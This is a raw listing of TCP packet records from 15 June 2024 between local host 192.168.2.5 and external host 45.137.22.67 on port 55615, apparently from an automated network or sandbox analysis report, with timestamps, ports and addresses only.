Jun 15, 2024 20:22:23.070229053 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.118232965 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.118518114 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.166363001 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.166462898 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.214201927 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.220511913 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.270370960 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.270559072 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.318248034 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.318428040 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.366364002 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.366983891 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.418523073 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.418622017 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.466478109 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.466589928 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.518975973 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.519157887 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.524339914 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524373055 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524425983 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.524440050 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524468899 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524559021 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.524575949 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.524626970 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524658918 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524687052 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524715900 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524720907 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.524744987 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524775028 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524785042 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.524804115 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524841070 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.524868011 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524897099 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524929047 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524956942 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524986029 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.525017977 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.525037050 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.525083065 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.525142908 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.525171041 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.525202990 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.525202990 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.525239944 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.525301933 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.525345087 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.525424957 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.525454998 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.525491953 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.525544882 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.525589943 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.526546955 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.530049086 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530211926 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530275106 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.530390024 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530421019 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530463934 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.530473948 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530504942 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530560017 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.530666113 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530694962 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530723095 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530762911 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.530777931 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530807018 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530836105 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530842066 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.530864954 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530893087 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530900955 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.530922890 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530927896 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.530951977 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530980110 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.530988932 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531008005 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531038046 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531047106 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531065941 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531119108 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531126976 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531157017 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531183958 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531208038 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531212091 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531240940 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531263113 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531270027 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531297922 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531322956 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531325102 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531354904 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531374931 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531383038 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531413078 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531439066 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531440973 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531471014 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531501055 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531506062 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531528950 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531558037 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531564951 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531586885 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531591892 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531615019 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531636000 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531642914 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531671047 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531699896 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531704903 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531728029 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531755924 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531755924 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531785011 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531824112 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531838894 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531883955 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531892061 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531913996 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531943083 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.531965971 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.531970978 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532001019 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532011986 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532030106 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532058954 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532080889 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532085896 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532114983 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532139063 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532144070 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532171965 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532196045 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532200098 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532227039 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532254934 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532263994 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532284021 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532311916 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532319069 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532341003 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532370090 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532375097 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532399893 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532428026 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532433033 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532457113 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532502890 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532502890 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532525063 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532535076 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532565117 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532583952 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532594919 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532612085 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532628059 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532655001 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532660961 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532684088 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532706976 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.532712936 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532741070 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.532766104 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.533492088 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.535161972 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.535294056 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.535322905 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.535341024 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.535353899 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.535393000 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.537592888 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537640095 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537669897 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537683964 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537694931 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.537695885 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537710905 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537717104 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.537729025 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537745953 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.537767887 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.537796974 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537811041 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537842035 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537854910 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537858009 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.537872076 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537905931 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.537926912 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537941933 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537952900 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537967920 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537980080 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.537991047 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.537993908 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538012981 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538018942 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538028002 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538041115 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538054943 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538074970 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538083076 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538096905 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538110971 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538121939 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538125992 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538134098 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538141012 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538151979 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538157940 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538172007 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538186073 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538187981 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538198948 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538207054 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538213015 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538229942 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538240910 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538255930 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538261890 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538271904 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538285971 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538297892 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538310051 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538331985 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538331985 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538347006 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538360119 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538373947 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538386106 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538397074 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538399935 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538413048 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.538414955 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538429976 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538455963 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538469076 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538481951 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538495064 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538507938 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538522005 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538533926 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538547039 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538559914 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538573027 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538599014 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538611889 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538624048 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538636923 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538650036 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538664103 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538687944 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538701057 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538712978 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538726091 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538753986 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538767099 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538779020 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538791895 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538809061 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538836956 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538851023 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538862944 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538893938 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538909912 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538938046 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538950920 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.538986921 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539000988 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539036989 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539094925 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539130926 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539144993 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539160013 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539278984 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539292097 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539305925 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539331913 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539345980 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539374113 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539388895 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539402008 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539427042 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539439917 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539453030 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539467096 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539520025 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539531946 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539544106 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539561033 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539572954 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539587975 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539621115 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539633989 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539644957 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539668083 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539680958 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539691925 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539719105 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539731979 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539743900 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539767981 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539781094 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539793968 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539807081 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539819002 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539844990 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539858103 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539870977 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539884090 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539896965 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539910078 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539921999 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539938927 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539952993 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539966106 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539978981 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.539992094 CEST	55615	49720	45.137.22.67	192.168.2.5
